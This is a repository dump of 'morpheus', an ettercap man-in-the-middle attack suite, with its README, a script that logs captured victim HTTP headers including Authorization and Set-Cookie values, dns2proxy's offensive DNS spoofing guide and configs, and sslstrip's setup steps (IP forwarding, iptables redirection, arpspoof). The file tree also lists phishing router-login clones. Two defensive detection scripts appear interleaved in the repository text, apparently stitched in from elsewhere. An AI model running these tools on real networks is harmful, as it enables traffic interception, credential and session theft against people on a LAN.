├── README.md ├── bin ├── .police-naples.png ├── DebugMe.sh ├── IG.sh ├── Utils │ ├── dns2proxy │ │ ├── .gitignore │ │ ├── README.md │ │ ├── dns2proxy.py │ │ ├── domains.cfg │ │ ├── handler_msg.sh │ │ ├── nospoof.cfg │ │ ├── nospoofto.cfg │ │ ├── resolv.conf │ │ ├── spoof.cfg │ │ └── victims.cfg │ ├── smbrelayx.py │ └── sslstrip-0.9 │ │ ├── COPYING │ │ ├── README │ │ ├── lock.ico │ │ ├── setup.py │ │ ├── sslstrip.py │ │ └── sslstrip │ │ ├── ClientRequest.py │ │ ├── CookieCleaner.py │ │ ├── DnsCache.py │ │ ├── SSLServerConnection.py │ │ ├── ServerConnection.py │ │ ├── ServerConnectionFactory.py │ │ ├── StrippingProxy.py │ │ ├── URLMonitor.py │ │ └── __init__.py ├── etter.conf ├── etter.dns ├── http.lua ├── phishing │ ├── Android-DOS-4.0.3.html │ ├── EasterEgg.html │ ├── Firefox-D0S-49.0.1.html │ ├── Google Sphere_files │ │ ├── api │ │ ├── defaulten.js │ │ └── ga.js │ ├── Google_prank_180 │ │ ├── Google.html │ │ └── googlelogo_color_272x92dp.png │ ├── clone.html │ ├── index.html │ ├── miss.png │ ├── router-modem │ │ ├── DLINK │ │ │ ├── img_wireless_bottom.gif │ │ │ ├── index.html │ │ │ ├── logo.gif │ │ │ ├── md5.js │ │ │ ├── substyle_DIR-615.css │ │ │ ├── ubicom.js │ │ │ └── xml_data.js │ │ ├── TPLink │ │ │ ├── encrypt.js.download │ │ │ ├── index.html │ │ │ ├── saved_resource.html │ │ │ ├── top1_1.jpg │ │ │ ├── top1_2.jpg │ │ │ └── top2.jpg │ │ ├── Technicolor │ │ │ ├── index.html │ │ │ ├── spacer.gif │ │ │ ├── styles.css │ │ │ └── user__xl.gif │ │ ├── ZTE │ │ │ ├── chinese_1.gif │ │ │ ├── close.gif │ │ │ ├── help.gif │ │ │ ├── index.html │ │ │ ├── login.css │ │ │ └── styleen.css │ │ ├── index.html │ │ ├── login.html │ │ └── new.html │ └── tor_0day │ │ ├── License │ │ ├── Tor-Exploit.html │ │ └── cssbanner.js ├── trigger.bat ├── warn.ogg ├── warn.sh └── www.gmail.com.pem ├── filters ├── EasterEgg.eft ├── IG.eft ├── UserAgent.eft ├── XSSBypass.eft ├── backdoor-on-the-fly.eft ├── chat_services.eft ├── cryptocurrency.eft ├── dhcp-discovery.eft ├── firewall.eft ├── 
grab_hosts.eft ├── https_downgrade.eft ├── img_replace.eft ├── packet_drop.eft ├── redirect.eft ├── rotate.eft ├── sidejacking.eft ├── ssh_downgrade.eft ├── template.eft ├── text_replace.eft ├── title_replace.eft └── top_ports.eft ├── logs └── .set ├── morpheus.sh ├── output └── .set └── settings

/README.md:
--------------------------------------------------------------------------------
[![Version](https://img.shields.io/badge/MORPHEUS-2.2-brightgreen.svg?maxAge=259200)]()
[![Stage](https://img.shields.io/badge/Release-STABLE-brightgreen.svg)]()
[![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]()
[![AUR](https://img.shields.io/aur/license/yaourt.svg)]()

# Morpheus - automated ettercap TCP/IP Hijacking tool
![morpheus v2.2-BETA](http://i.cubeupload.com/SpNvM5.png)

Version release: v2.2 - STABLE
Author: pedro ubuntu [ r00t-3xp10it ]
Codename: oneiroi phobetor (the mythological Greek dream god)
Distros Supported: Linux Ubuntu, Kali, Debian, BackBox, Parrot OS
Suspicious-Shell-Activity© (SSA) RedTeam develop @2018

# LEGAL DISCLAIMER
The author does not hold any responsibility for the bad use of this tool,
remember that attacking targets without prior consent is illegal and punished by law.

# Framework description
Morpheus is a Man-In-The-Middle (MITM) suite that allows users to manipulate
tcp/udp data using ettercap, urlsnarf, msgsnarf and tcpkill as backend applications.
The main objective of this tool is not to provide an easy way to exploit/sniff targets,
but rather to call attention to tcp/udp manipulation techniques (etter filters).

Morpheus ships with some pre-configured filters, and it allows users to improve them
when launching the attack (morpheus scripting console). At the end of the attack morpheus
reverts the filter back to its default state, which lets users improve filters at
run time without the fear of messing with filter command syntax and spoiling the filter.
"Perfect for scripting fans to safely test new concepts"...

HINT: morpheus allows you to improve filters in 2 different ways
1º - Edit the filter before running morpheus and the 'changes' will be permanent
2º - Edit the filter using the 'morpheus scripting console' and the changes are active only once

# What can we accomplish by using filters?
morpheus comes with a collection of filters written by me to accomplish various tasks:
replacing images in webpages, replacing text in webpages, injecting payloads in webpages,
denial-of-service attacks (drop,kill packets from source), redirecting browser traffic
to another domain, and it gives you the ability to build and compile your own filter from scratch
and run it through the morpheus framework (option W).

"filters can be extended using browser languages like: javascript,css,flash,etc"...

> In this example we are using " HTML tag" to inject a redirection url into the target request
![morpheus v1.6-Alpha](http://i.cubeupload.com/jn83zh.png)
> In this example we are using 'CSS3' to trigger webpage 180º rotation
![morpheus v1.6-Alpha](http://i.cubeupload.com/XSWm0P.png)

# Framework limitations
1º - morpheus will fail if the target system is protected against arp poison attacks
2º - the target system sometimes needs to clear the net cache for arp poison to be effective
3º - many attacks described in morpheus may be dropped by the target's HSTS detection system.

> 4º - morpheus needs ettercap to be executed with high privileges (uid 0 | gid 0).
> correct ettercap configuration display (running as Admin without ssl dissectors active)
![morpheus v1.6-Alpha](http://i.cubeupload.com/RIq2yO.png)

By default morpheus (at startup) will replace the original etter.conf/etter.dns files
provided by ettercap. On exit morpheus will revert those files to their original state.
[ IT'S IMPORTANT TO EXIT THE TOOL PROPERLY TO REVERT THE CHANGES MADE (press 'E' to exit) ]

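Limitation 1º above is the defender's main lever: every morpheus module depends on ARP poisoning going unnoticed. The following is an added example (not part of the morpheus repository) that flags neighbour-table entries consistent with ARP poisoning; the sample `ip neigh` output, the addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed `ip neigh show` output (not captured from a real network).
BASELINE = """\
192.168.1.254 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.67 dev eth0 lladdr aa:bb:cc:00:00:67 STALE
192.168.1.71 dev eth0 lladdr aa:bb:cc:00:00:71 REACHABLE
"""

# Same LAN a little later: the gateway now resolves to the MAC of 192.168.1.71.
POISONED = """\
192.168.1.254 dev eth0 lladdr aa:bb:cc:00:00:71 REACHABLE
192.168.1.67 dev eth0 lladdr aa:bb:cc:00:00:67 STALE
192.168.1.71 dev eth0 lladdr aa:bb:cc:00:00:71 REACHABLE
192.168.1.80 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>[0-9a-fA-F:]{17})\s+(?P<state>\S+)"
)


def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address.

    Entries without `lladdr` (FAILED / INCOMPLETE) are skipped.
    """
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def find_arp_anomalies(current, baseline=None, gateway=None):
    """Return (severity, kind, subject, detail) tuples.

    duplicate-mac: one MAC answers for several IPs (the poisoner usually
                   shares its MAC with the gateway address).
    mac-changed:   an IP maps to a different MAC than in the baseline.
    Anything involving the gateway is rated "high".
    """
    findings = []

    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            severity = "high" if gateway in ips else "medium"
            findings.append((severity, "duplicate-mac", mac, tuple(sorted(ips))))

    if baseline:
        for ip, mac in sorted(current.items()):
            old = baseline.get(ip)
            if old and old != mac:
                severity = "high" if ip == gateway else "medium"
                findings.append((severity, "mac-changed", ip, (old, mac)))

    return findings


if __name__ == "__main__":
    base = parse_neigh(BASELINE)
    now = parse_neigh(POISONED)
    for finding in find_arp_anomalies(now, base, gateway="192.168.1.254"):
        print(finding)
```

Pinning the gateway with a static neighbour entry, or enabling Dynamic ARP Inspection on the switch, removes the condition this check looks for.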
# Dependencies
required: ettercap, nmap, zenity, apache2
sub-dependencies: driftnet, dsniff (urlsnarf,tcpkill,msgsnarf), sslstrip-0.9, dns2proxy

# Credits
ettercap (alor&naga) | nmap (fyodor) | apache2 (Rob McCool) | dsniff (Dug Song)
filters: irongeek (replace img) | seannicholls (rotate 180º) | TheBlaCkCoDeR09 (ToR-Browser-0day)

# Download/Install
1º - git clone https://github.com/r00t-3xp10it/morpheus.git
2º - cd morpheus
3º - chmod -R +x *.sh
4º - chmod -R +x *.py
5º - nano settings
6º - sudo ./morpheus.sh



## Nmap scans available [option S]
![morpheus v2.2-Alpha](http://i.cubeupload.com/O2h9Hd.png)

Morpheus v2.2 allows its users to scan with nmap sending a fake User_Agent [ IPhone ]
Activate this special function in the [ settings ] file under the morpheus main folder.
HINT: This setting is only available in morpheus [ scan LAN for live hosts ]

![morpheus v2.2-Alpha](http://i.cubeupload.com/hp9r2u.png)

HINT: we can edit the morpheus http.lua lib and input another user_agent before running the tool.
HINT: My modified http.lua lib also allows different user_agent inputs at run-time like:
nmap -sV --script-args http.useragent="Apache-HttpClient/4.0.3 (java 1.5)" Target-Ip

![morpheus v2.2-Alpha](http://i.cubeupload.com/v1aIGd.png)

## Detecting DHCP requests to access local lan [option 17]
![morpheus v2.2-Alpha](http://i.cubeupload.com/EKAYLP.jpg)

## Detecting-blocking crypto currency connections [option 18]
![morpheus v2.2-Alpha](http://i.cubeupload.com/cbAoeY.png)

## Redirect all devices in LAN to google prank [option 19]
![morpheus v2.2-Alpha](http://i.cubeupload.com/ZE4Cy5.png)
![morpheus v2.2-Alpha](http://i.cubeupload.com/xxmyex.png)
`HINT: This module depends on the .im domain not being redirected`

## firewall filter screenshots [option 1]

The firewall [option 1] pre-configured filter will capture credentials from the following services:
http,ftp,ssh,telnet (facebook uses https/ssl :( ), report suspicious connections, report common
social-media browsing (facebook,twitter,youtube), report the existence of botnet connections like
Mocbot IRC Bot and Darkcomet, redirect browser traffic, and allow users to block connections (drop,kill).
"Remember: morpheus gives its users the ability to 'add more rules' to filters before execution"

    [morpheus] host:192.168.1.67   [ -> ]  port:23 telnet  ☆
               Source ip addr       flow   destination     rank good

    [morpheus] host:192.168.1.67   [ <- ]  port:23 telnet  ☠
               Destination ip       flow   source port     rank suspicious

![morpheus v2.2-Alpha](http://i.cubeupload.com/nbgSuj.png)

![morpheus v2.2-Alpha](http://i.cubeupload.com/Hx0JV4.png)

![morpheus v2.2-Alpha](http://i.cubeupload.com/LzqZGc.png)

![morpheus v2.2-Alpha](http://i.cubeupload.com/z8M94O.png)

> Basically the firewall filter acts as both an offensive and a defensive tool, analyzing the
> tcp/udp data flow to report logins,suspicious traffic,brute-force,block target ip,etc.

---

_EOF

--------------------------------------------------------------------------------
/bin/.police-naples.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/.police-naples.png

--------------------------------------------------------------------------------
/bin/IG.sh:
--------------------------------------------------------------------------------
#!/bin/sh
##
# 'http tcp header information gathering'
# This script parses tcp header data collected by morpheus under MITM attacks.
# Basically we use the morpheus.sh tool to poison a target host on the LAN to be able to
# capture its network communications and extract juicy info from tcp headers.
# Special Thanks: shanty damayanti
## resize -s 27 109 > /dev/null



#
# Variable declarations function ..
#
cd ..
rhost=`cat output/ip.mop | egrep -m 1 "target:" | cut -d ':' -f2`
iface=`netstat -r | grep "default" | awk {'print $8'}`
mod=`route -n | grep "UG" | awk {'print $2'} | tr -d '\n'`
#
# Use warning sounds in every capture?
# Special thanks: shanty damayanti (parrot OS)
#
echo "╔───────────────────────────────────────╗"
echo "| http tcp header information gathering |"
echo "╚───────────────────────────────────────╝"
echo -n "Be alerted by a BEEP in every capture? (y/n):";read op
# quote $op so an empty answer does not break the test
if [ "$op" = "y" ] || [ "$op" = "yes" ]; then
   OGG=`locate .ogg | grep "default/alerts" | head -3 | tail -1`
   warn=yes
else
   warn=no
fi



#
# Script banner
#
clear
echo "╔───────────────────────────────────────╗"
echo "| http tcp header information gathering |"
echo "╚───────────────────────────────────────╝"
echo " | Interface : $iface"
echo " | Rhost : $rhost"
echo " |_ Gateway : $mod"
echo ""


#
# Start of loop function ..
#
while :
do

   # check for logfile presence ..
   if [ -e logs/IG.log ]; then
      hour=`date | awk {'print $4,$5,$6'}`
      echo "" && echo "Tcp header capture"
      echo "Hour/Time: $hour"
      #
      # Play alert sound (paplay) settings ..
      #
      if [ "$warn" = "yes" ]; then
         if [ -e bin/warn.ogg ]; then
            paplay bin/warn.ogg
         else
            paplay "$OGG"
         fi
      fi


      #
      # Parsing captured data from IG.log file ..
      # (redirect target corrected from /dev/nul to /dev/null)
      #
      TST=`cat logs/IG.log | egrep -m 1 "Tk:" | awk {'print $2'}` > /dev/null 2>&1
      DNT=`cat logs/IG.log | egrep -m 1 "DNT:" | awk {'print $2'}` > /dev/null 2>&1
      HST=`cat logs/IG.log | egrep -m 1 "Host:" | awk {'print $2'}` > /dev/null 2>&1
      FEM=`cat logs/IG.log | egrep -m 1 "From:" | awk {'print $2,$3,$4'}` > /dev/null 2>&1
      RFR=`cat logs/IG.log | egrep -m 1 "Referer:" | awk {'print $2,$3'}` > /dev/null 2>&1
      SER=`cat logs/IG.log | egrep -m 1 "Server:" | awk {'print $2,$3,$4,$5'}` > /dev/null 2>&1
      FWR=`cat logs/IG.log | egrep -m 1 "Forwarded:" | awk {'print $2,$3,$4'}` > /dev/null 2>&1
      XFO=`cat logs/IG.log | egrep -m 1 "X-Frame-Options:" | awk {'print $2'}` > /dev/null 2>&1
      CON=`cat logs/IG.log | egrep -m 1 "Connection:" | awk {'print $2,$3,$4'}` > /dev/null 2>&1
      CTT=`cat logs/IG.log | egrep -m 1 "Content-Type:" | awk {'print $2,$3,$4'}` > /dev/null 2>&1
      AUT=`cat logs/IG.log | egrep -m 1 "Authorization:" | awk {'print $2,$3,$4'}` > /dev/null 2>&1
      XSS=`cat logs/IG.log | egrep -m 1 "X-XSS-Protection:" | awk {'print $2,$3'}` > /dev/null 2>&1
      XCO=`cat logs/IG.log | egrep -m 1 "X-Content-Type-Options:" | awk {'print $2'}` > /dev/null 2>&1
      CHC=`cat logs/IG.log | egrep -m 1 "Cache-Control:" | awk {'print $2,$3,$4,$5'}` > /dev/null 2>&1
      XFH=`cat logs/IG.log | egrep -m 1 "X-Forwarded-Host:" | awk {'print $2,$3,$4'}` > /dev/null 2>&1
      CEN=`cat logs/IG.log | egrep -m 1 "Content-Encoding:" | awk {'print $2,$3,$4'}` > /dev/null 2>&1
      ACS=`cat logs/IG.log | egrep -m 1 "Accept-Charset:" | awk {'print $2,$3,$4,$5'}` > /dev/null 2>&1
      CTL=`cat logs/IG.log | egrep -m 1 "Content-Language:" | awk {'print $2,$3,$4,$5'}` > /dev/null 2>&1
      STC=`cat logs/IG.log | egrep -m 1 "Set-Cookie:" | awk {'print $2,$3,$4,$5,$6,$7'}` > /dev/null 2>&1
      LGA=`cat logs/IG.log | egrep -m 1 "Accepted-Language:" | awk {'print $2,$3,$4,$5'}` > /dev/null 2>&1
      HSTS=`cat logs/IG.log | egrep -m 1 "Strict-Transport-Security:" | awk {'print $2,$3,$4,$5'}` > /dev/null 2>&1
      ACAM=`cat logs/IG.log | egrep -m 1 "Access-Control-Allow-Methods:" | awk {'print $2,$3,$4,$5,$6'}` > /dev/null 2>&1
      TUA=`cat logs/IG.log | egrep -m 1 "User-Agent:" | awk {'print $2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14'}` > /dev/null 2>&1


      #
      # Print OnScreen headers captured ..
      #
      sleep 0.8
      echo "------------------------------------------------"
      echo "Host : $HST"
      echo "DNT(Do Not Track) : $DNT"
      echo "Tk(track status) : $TST"
      echo "Content-Language : $CTL"
      echo "Accepted-Language : $LGA"
      echo "Connection : $CON"
      echo "Content-Encoding : $CEN"
      echo "X-XSS-Protection : $XSS"
      echo "From : $FEM"
      echo "Server : $SER"
      echo "Allow-Methods : $ACAM"
      echo "Cache-Control : $CHC"
      echo "X-Forwarded-Host : $XFH"
      echo "X-Content-Type-Opt : $XCO"
      echo "X-Frame-Options : $XFO"
      echo "Accept-Charset : $ACS"
      echo "Content-Type : $CTT"
      echo "HSTS : $HSTS"
      echo "Authorization : $AUT"
      echo "Set-Cookie : $STC"
      echo "Forwarded : $FWR"
      echo "Referer : $RFR"
      echo "User-Agent : $TUA"
      echo "------------------------------------------------"
      echo "[HELP] HTTP Headers : https://mzl.la/2OWMOte"


      #
      # Build new logfile with ALL the different packets data captured
      # for later review ( ../morpheus/logs/192.168.1.71-header_capture.log ).
      # One grouped redirect appends the whole record to the per-target log.
      #
      if [ -d logs ]; then
         {
            echo ""
            echo "Tcp header capture"
            echo "Target ip: $rhost"
            echo "Hour/Time: $hour"
            echo "------------------------------------------------"
            echo "Host : $HST"
            echo "DNT(Do Not Track) : $DNT"
            echo "Tk(track status) : $TST"
            echo "Content-Language : $CTL"
            echo "Accepted-Language : $LGA"
            echo "Connection : $CON"
            echo "Content-Encoding : $CEN"
            echo "X-XSS-Protection : $XSS"
            echo "From : $FEM"
            echo "Server : $SER"
            echo "Allow-Methods : $ACAM"
            echo "Cache-Control : $CHC"
            echo "X-Forwarded-Host : $XFH"
            echo "X-Content-Type-Opt : $XCO"
            echo "X-Frame-Options : $XFO"
            echo "Accept-Charset : $ACS"
            echo "Content-Type : $CTT"
            echo "HSTS : $HSTS"
            echo "Authorization : $AUT"
            echo "Set-Cookie : $STC"
            echo "Forwarded : $FWR"
            echo "Referer : $RFR"
            echo "User-Agent : $TUA"
            echo "------------------------------------------------"
            echo "[HELP] HTTP Headers : https://mzl.la/2OWMOte"
            echo ""
         } >> "logs/$rhost-header_capture.log"
      else
         echo "[ERROR] ../morpheus/logs/$rhost-header_capture.log [ NOT BUILD ]"
      fi


      echo ""
      # delete temp logfile
      rm -f logs/IG.log > /dev/null 2>&1
      sleep 1.3
   fi


# end loop
done

# exit script
exit

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/.gitignore:
--------------------------------------------------------------------------------
.idea
*.txt

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/README.md:
--------------------------------------------------------------------------------
dns2proxy
=========

Offensive DNS server

This tool offers different features for post-exploitation once you change the DNS server of a victim.


Feature 1
---------

Traditional DNS spoofing, adding the original IP address to the response.

Using spoof.cfg file:

hostname ip.ip.ip.ip

>root@kali:~/dns2proxy# echo "www.s21sec.com 1.1.1.1" > spoof.cfg
>
>// launch in another terminal dns2proxy.py
>
>root@kali:~/dns2proxy# nslookup www.s21sec.com 127.0.0.1
>Server: 127.0.0.1
>Address: 127.0.0.1#53
>
>Name: www.s21sec.com
>Address: 1.1.1.1
>Name: www.s21sec.com
>Address: 88.84.64.30


or you can use the domains.cfg file to spoof all hosts of the same domain:

>root@kali:~/demoBH/dns2proxy# cat dominios.cfg
>.domain.com 192.168.1.1
>
>root@kali:~/demoBH/dns2proxy# nslookup aaaa.domain.com 127.0.0.1
>Server: 127.0.0.1
>Address: 127.0.0.1#53
>
>Name: aaaa.domain.com
>Address: 192.168.1.1

Hostnames in nospoof.cfg will not be spoofed.

Feature 2
---------

This feature implements the DNS spoofing attack by adding 2 IP addresses at the top of the resolution and configuring the system to forward the connections.
Check my slides at BlackHat Asia 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES](http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and the [Demo Video](http://www.youtube.com/watch?v=cJtbxX1HS5I).

To launch this attack there is a shell script that automatically configures the system using iptables. You must edit this file to adapt it to your system. DON'T FORGET the AdminIP variable!!!!

Both IPs must be on the same system to let dns2proxy.py configure the forwarding.

Usage: ia.sh < interface > [ip1] [ip2]


>root@kali:~/dns2proxy# ./ia.sh eth0 172.16.48.128 172.16.48.230
>Non spoofing imap.gmail.com
>Non spoofing mail.s21sec.com
>Non spoofing www.google.com
>Non spoofing www.apple.com
>Non spoofing ccgenerals.ms19.gamespy.com
>Non spoofing master.gamespy.com
>Non spoofing gpcm.gamespy.com
>Non spoofing launch.gamespyarcade.com
>Non spoofing peerchat.gamespy.com
>Non spoofing gamestats.gamespy.com
>Specific host spoofing www.s21sec.com with 1.1.1.1
>Specific domain IP .domain.com with 192.168.1.1
>binded to UDP port 53.
>waiting requests.
>Starting sniffing in (eth0 = 172.16.48.128)....
>
>< at other terminal >
>
>root@kali:~/dns2proxy# nslookup www.microsoft.com 127.0.0.1
>Server: 127.0.0.1
>Address: 127.0.0.1#53
>
>Name: www.microsoft.com
>Address: 172.16.48.128
>Name: www.microsoft.com
>Address: 172.16.48.230
>Name: www.microsoft.com
>Address: 65.55.57.27


The fhtang.sh script will terminate the program and restore normal iptables.

Hostnames in nospoof.cfg will not be spoofed.


Feature 3
---------

The DNS server automatically detects and corrects the changes that my sslstrip+ makes to hostnames to avoid HSTS, so it will respond properly.

This server is necessary to perform the sslstrip+ attack.

>root@kali:~/dns2proxy# nslookup webaccounts.google.com 127.0.0.1     <-- DNS response like accounts.google.com
>Server: 127.0.0.1
>Address: 127.0.0.1#53
>
>Name: webaccounts.google.com
>Address: 172.16.48.128
>Name: webaccounts.google.com
>Address: 172.16.48.230
>Name: webaccounts.google.com
>Address: 74.125.200.84
>
>root@kali:~/dns2proxy# nslookup wwww.yahoo.com 127.0.0.1     <-- Take care of the 4 w! DNS response like
>Server: 127.0.0.1                                                 www.yahoo.com
>Address: 127.0.0.1#53
>
>Name: wwww.yahoo.com
>Address: 172.16.48.128
>Name: wwww.yahoo.com
>Address: 172.16.48.230
>Name: wwww.yahoo.com
>Address: 68.142.243.179
>Name: wwww.yahoo.com
>Address: 68.180.206.184


Installation
------------

dnspython (www.dnspython.com) is needed.
Tested with Python 2.6 and Python 2.7.


Config files description
------------------------

domains.cfg (or dominios.cfg): resolve all hosts for the listed domains with the listed IP
>Ex:
>.facebook.com 1.2.3.4
>.fbi.gov 1.2.3.4

spoof.cfg: Spoof a host with an IP
>Ex:
>www.nsa.gov 127.0.0.1

nospoof.cfg: Always send a legitimate response when asked for these hosts.
>Ex.
>mail.google.com

nospoofto.cfg: Don't send fake responses to the IPs listed there.
>Ex:
>127.0.0.1
>4.5.6.8

victims.cfg: If not empty, only send fake responses to these IP addresses.
>Ex:
>23.66.163.36
>195.12.226.131

resolv.conf: DNS server to forward the queries to.
>Ex:
>nameserver 8.8.8.8

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/domains.cfg:
--------------------------------------------------------------------------------
.domain.com 8.8.9.9
.thisisalongdomainnameasdfasdfafsd.com 178.62.64.250

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/handler_msg.sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/Utils/dns2proxy/handler_msg.sh

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/nospoof.cfg:
--------------------------------------------------------------------------------
imap.gmail.com
mail.s21sec.com
www.google.com
www.google.pt

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/nospoofto.cfg:
--------------------------------------------------------------------------------
127.0.0.1

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/resolv.conf:
--------------------------------------------------------------------------------
nameserver 8.8.8.8

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/spoof.cfg:
--------------------------------------------------------------------------------
flash.domain.com 192.168.187.135

--------------------------------------------------------------------------------
/bin/Utils/dns2proxy/victims.cfg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/Utils/dns2proxy/victims.cfg

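Feature 3 of the dns2proxy README above shows the hostname rewrites that accompany sslstrip+ (`wwww.yahoo.com`, `webaccounts.google.com`), and those names are visible in resolver logs. This added example (not dns2proxy code) scans a query log for the two patterns; the dnsmasq-style log lines, the `KNOWN_HOSTS` allow-list and the function names are assumptions constructed for the example.

```python
import re

# Constructed dnsmasq-style query log (not from a real resolver).
SAMPLE_LOG = """\
Mar  3 10:00:01 dnsmasq[811]: query[A] www.yahoo.com from 192.168.1.67
Mar  3 10:00:02 dnsmasq[811]: reply www.yahoo.com is 68.142.243.179
Mar  3 10:00:05 dnsmasq[811]: query[A] wwww.yahoo.com from 192.168.1.67
Mar  3 10:00:09 dnsmasq[811]: query[A] webaccounts.google.com from 192.168.1.67
Mar  3 10:00:11 dnsmasq[811]: query[A] webmail.example.com from 192.168.1.71
Mar  3 10:00:12 dnsmasq[811]: query[AAAA] webcache.example.net from 192.168.1.71
"""

# Hypothetical allow-list: hostnames clients on this network legitimately use
# (for instance exported from proxy logs). Constructed for the example.
KNOWN_HOSTS = {
    "www.yahoo.com",
    "accounts.google.com",
    "mail.example.com",
    "webmail.example.com",   # a real host that happens to start with "web"
}

QUERY_RE = re.compile(
    r"query\[(?P<qtype>[A-Z0-9]+)\]\s+(?P<name>\S+)\s+from\s+(?P<client>\S+)"
)


def demangle(qname):
    """Undo the two rewrites shown in the README, or return None.

    wwww.<rest>      -> www.<rest>
    web<label>.<rest> -> <label>.<rest>
    """
    name = qname.rstrip(".").lower()
    first, _, rest = name.partition(".")
    if not rest:
        return None
    if first == "wwww":
        return "www." + rest
    if first.startswith("web") and len(first) > 3:
        return first[3:] + "." + rest
    return None


def find_mangled_queries(log_text, known_hosts):
    """Return (client, queried_name, original_name) for suspicious queries.

    A query is reported only when the demangled name is a known host and the
    queried name itself is not, which keeps genuine names such as
    webmail.example.com out of the results.
    """
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        queried = m["name"].rstrip(".").lower()
        original = demangle(queried)
        if original in known_hosts and queried not in known_hosts:
            hits.append((m["client"], queried, original))
    return hits


if __name__ == "__main__":
    for client, queried, original in find_mangled_queries(SAMPLE_LOG, KNOWN_HOSTS):
        print("%s asked for %s (looks like rewritten %s)" % (client, queried, original))
```

A hit means a client was handed a rewritten link over plain HTTP, so the client's ARP and DNS settings are the next thing to inspect.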
--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/README:
--------------------------------------------------------------------------------
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing:
    * Unpack: tar zxvf sslstrip-0.5.tar.gz
    * Install twisted: sudo apt-get install python-twisted-web
    * (Optionally) run 'python setup.py install' as root to install,
      or you can just run it out of the directory.

Running:
    sslstrip can be run from the source base without installation.
    Just run 'python sslstrip.py -h' as a non-root user to get the
    command-line options.

    The four steps to getting this working (assuming you're running Linux)
    are:

    1) Flip your machine into forwarding mode (as root):
       echo "1" > /proc/sys/net/ipv4/ip_forward

    2) Setup iptables to intercept HTTP requests (as root):
       iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

    3) Run sslstrip with the command-line options you'd like (see above).

    4) Run arpspoof to redirect traffic to your machine (as root):
       arpspoof -i -t

More Info:
    http://www.thoughtcrime.org/software/sslstrip/

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/lock.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/Utils/sslstrip-0.9/lock.ico

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/setup.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
import sys, os, shutil
from distutils.core import setup, Extension


shutil.copyfile("sslstrip.py", "sslstrip/sslstrip")

setup (name = 'sslstrip',
       version = '0.9',
       description = 'A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.',
       author = 'Moxie Marlinspike',
       author_email = 'moxie@thoughtcrime.org',
       url = 'http://www.thoughtcrime.org/software/sslstrip/',
       license = 'GPL',
       packages = ["sslstrip"],
       package_dir = {'sslstrip' : 'sslstrip/'},
       scripts = ['sslstrip/sslstrip'],
       data_files = [('share/sslstrip', ['README', 'COPYING', 'lock.ico'])],
       )

print "Cleaning up..."
try:
    removeall("build/")
    os.rmdir("build/")
except:
    pass

try:
    os.remove("sslstrip/sslstrip")
except:
    pass

def capture(cmd):
    return os.popen(cmd).read().strip()

def removeall(path):
    if not os.path.isdir(path):
        return

    files=os.listdir(path)

    for x in files:
        fullpath=os.path.join(path, x)
        if os.path.isfile(fullpath):
            f=os.remove
            rmgeneric(fullpath, f)
        elif os.path.isdir(fullpath):
            removeall(fullpath)
            f=os.rmdir
            rmgeneric(fullpath, f)

def rmgeneric(path, __func__):
    try:
        __func__(path)
    except OSError, (errno, strerror):
        pass

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks."""

__author__ = "Moxie Marlinspike"
__email__ = "moxie@thoughtcrime.org"
__license__= """
Copyright (c) 2004-2009 Moxie Marlinspike

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 3 of the
License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA

"""

from twisted.web import http
from twisted.internet import reactor

from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
from sslstrip.CookieCleaner import CookieCleaner

import sys, getopt, logging, traceback, string, os

gVersion = "0.9"

def usage():
